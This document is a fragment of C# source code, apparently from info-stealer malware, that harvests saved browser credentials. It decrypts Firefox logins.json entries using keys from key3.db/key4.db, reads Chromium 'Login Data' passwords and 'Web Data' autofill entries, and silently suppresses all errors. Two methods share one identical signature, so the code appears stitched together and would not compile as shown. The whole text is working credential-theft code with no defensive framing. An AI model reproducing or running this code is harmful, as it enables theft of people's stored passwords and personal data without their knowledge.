private static List <LoginPair> ParseLogins(string profile, byte[] privateKey)
{
List <LoginPair> list = new List <LoginPair>();
try
{
if (!File.Exists(Path.Combine(profile, "logins.json")))
{
return(list);
}
bool flag;
string path = DecryptHelper.TryCreateTemp(Path.Combine(profile, "logins.json"), out flag);
foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"]))
{
JsonValue jsonValue = (JsonValue)obj;
Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string text = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
LoginPair loginPair = new LoginPair
{
Host = (string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false)),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")
{
list.Add(loginPair);
}
}
if (flag)
{
File.Delete(path);
}
}
catch (Exception)
{
}
return(list);
}
private static List <Autofill> EnumFills(string profilePath)
{
List <Autofill> list = new List <Autofill>();
try
{
string text = Path.Combine(profilePath, "Web Data");
if (!File.Exists(text))
{
return(list);
}
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text));
sqlConnection.ReadTable("autofill");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
Autofill autofill = null;
try
{
autofill = new Autofill
{
Name = sqlConnection.ParseValue(i, "name").Trim(),
Value = sqlConnection.ParseValue(i, "value").Trim()
};
}
catch
{
}
if (autofill != null)
{
list.Add(autofill);
}
}
return(list);
}
catch
{
return(list);
}
}
private static List <LoginPair> GetCredentials(string profile)
{
List <LoginPair> list = new List <LoginPair>();
try
{
if (File.Exists(Path.Combine(profile, "key3.db")))
{
list.AddRange(ParseLogins(profile, GetPrivate3Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key3.db")))));
}
if (!File.Exists(Path.Combine(profile, "key4.db")))
{
return(list);
}
list.AddRange(ParseLogins(profile, GetPrivate4Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key4.db")))));
return(list);
}
catch
{
return(list);
}
}
private static List <LoginPair> GetCredentials(string profilePath)
{
List <LoginPair> loginPairList = new List <LoginPair>();
try
{
string str = Path.Combine(profilePath, "Login Data");
if (!File.Exists(str))
{
return(loginPairList);
}
string[] strArray = profilePath.Split(new string[1] {
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State");
SqlConnection manager = new SqlConnection(DecryptHelper.CreateTempCopy(str));
manager.ReadTable("logins");
for (int row = 0; row < manager.RowLength; ++row)
{
LoginPair loginPair = new LoginPair();
try
{
loginPair = ChromiumEngine.ReadData(manager, row, localStatePath);
}
catch
{
}
if (loginPair.Login.IsNotNull <string>() && loginPair.Login != "UNKNOWN" && (loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN"))
{
loginPairList.Add(loginPair);
}
}
}
catch
{
}
return(loginPairList);
}
